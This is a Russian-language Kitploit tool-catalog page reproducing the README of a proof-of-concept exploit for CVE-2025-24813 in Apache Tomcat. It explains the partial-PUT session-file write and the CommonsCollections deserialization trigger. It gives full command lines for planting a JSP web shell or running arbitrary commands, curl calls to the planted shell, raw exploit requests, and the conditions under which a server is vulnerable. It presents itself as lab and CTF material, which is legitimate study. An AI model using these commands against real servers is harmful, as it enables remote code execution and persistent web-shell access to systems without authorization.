Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-24813 — правильный payload для java CVE | Kitploit
Инструменты/GitHubGitHub/loufa0/cve-2025-24813
Сканеры уязвимостейЭксплуатацияВеб-безопасностьCTFОбучение и ОбразованиеЛаборатории и Практика
GitHubloufa0/cve-2025-24813

CVE-2025-24813

правильный payload для java CVE

Репозиторий
522 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-24813 Tomcat PoC

PoC для авторизованной среды CTF/лаборатории. Он эксплуатирует CVE-2025-24813 через частичную запись PUT файла сессии Tomcat, а затем запускает десериализацию с помощью JSESSIONID.

Предварительные требования

  • Python 3
  • Модуль Python requests
  • Java JDK (java и javac)
  • Включённый файл commons-collections-3.2.1.jar, размещённый в этой папке

ysoserial не требуется.

Файлы

  • poc_cve_2025_24813.py: обёртка Python, автоматизирующая генерацию, загрузку и триггер.
  • GenerateTomcatSessionPayload.java: генерирует валидную сессию Tomcat, содержащую гаджет CommonsCollections.
  • commons-collections-3.2.1.jar: зависимость гаджета.
  • sh.jsp: опциональный JSP-шелл, разворачиваемый через --drop-shell.
  • Использование

    Разместить JSP-шелл в веб-корне по умолчанию /opt/tomcat/webapps/ROOT:

    root@kitploit:~
    ./poc_cve_2025_24813.py http://TARGET:8080 \
      --session-id poc24813 \
      --drop-shell \
      --shell-name sh.jsp
    

    Выполнить прямую команду без размещения шелла:

    root@kitploit:~
    ./poc_cve_2025_24813.py http://TARGET:8080 \
      --session-id cmd24813 \
      --cmd 'id > /opt/tomcat/webapps/ROOT/rce.txt'
    

    Если веб-корень отличается:

    root@kitploit:~
    ./poc_cve_2025_24813.py http://TARGET:8080 \
      --drop-shell \
      --webroot /path/to/webroot \
      --shell-name sh.jsp
    

    Если JAR-файл перемещён, укажите его путь:

    root@kitploit:~
    ./poc_cve_2025_24813.py http://TARGET:8080 \
      --jar /path/to/commons-collections-3.2.1.jar \
      --drop-shell
    

    После эксплуатации

    Если --drop-shell успешен:

    root@kitploit:~
    curl --get --data-urlencode 'cmd=id' http://TARGET:8080/sh.jsp
    curl --get --data-urlencode 'cmd=cat /opt/tomcat/user.flg' http://TARGET:8080/sh.jsp
    

    Условия на стороне цели

    • Уязвимая версия Tomcat.
    • DefaultServlet доступен для записи, обычно readonly=false.
    • Поддержка частичного PUT.
    • Постоянные сессии через PersistentManager и FileStore.
    • Цепочка гаджетов, доступная на стороне сервера, здесь commons-collections.

    Ожидаемое поведение при загрузке — часто HTTP 409 Conflict на:

    root@kitploit:~
    PUT /<session-id>/session
    Content-Range: bytes 0-1000/1200
    

    Затем десериализация инициируется с:

    root@kitploit:~
    Cookie: JSESSIONID=.<session-id>
    
    Скачать инструмент